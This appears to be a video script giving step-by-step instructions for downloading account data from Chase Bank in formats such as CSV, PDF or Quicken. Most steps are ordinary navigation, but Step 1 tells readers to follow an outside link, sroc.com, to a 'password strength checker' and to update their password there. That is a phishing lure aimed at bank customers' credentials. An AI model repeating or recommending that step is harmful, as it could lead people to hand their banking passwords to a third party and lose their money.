Downloading your account data from Chase Bank is a straightforward process that can help you manage your finances more effectively. Follow these steps to retrieve your information. Step 1. Log into your Chase account. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to account activity. Once logged in, locate the Accounts tab on the main dashboard. Click on it to view a list of your accounts, then select the specific account for which you want to download data. Step 3. Access download options. After selecting your account, look for the Statements or Activity section. Here, you should find options to download your account data, typically labeled as Download or Export. Step 4. Choose the file format. Select your preferred file format for the download. Chase usually offers options like CSV, PDF, or Quicken. Choose the format that best suits your needs for further analysis or record keeping. Step 5. Download and save the file. Click the Download button after selecting the format. The file will be saved to your device, usually in your Downloads folder. Make sure to check the file to confirm that it contains the information you need. By following these steps, you can easily download your account data from Chase Bank. Regularly downloading your financial data can help you stay organized and informed about your finances.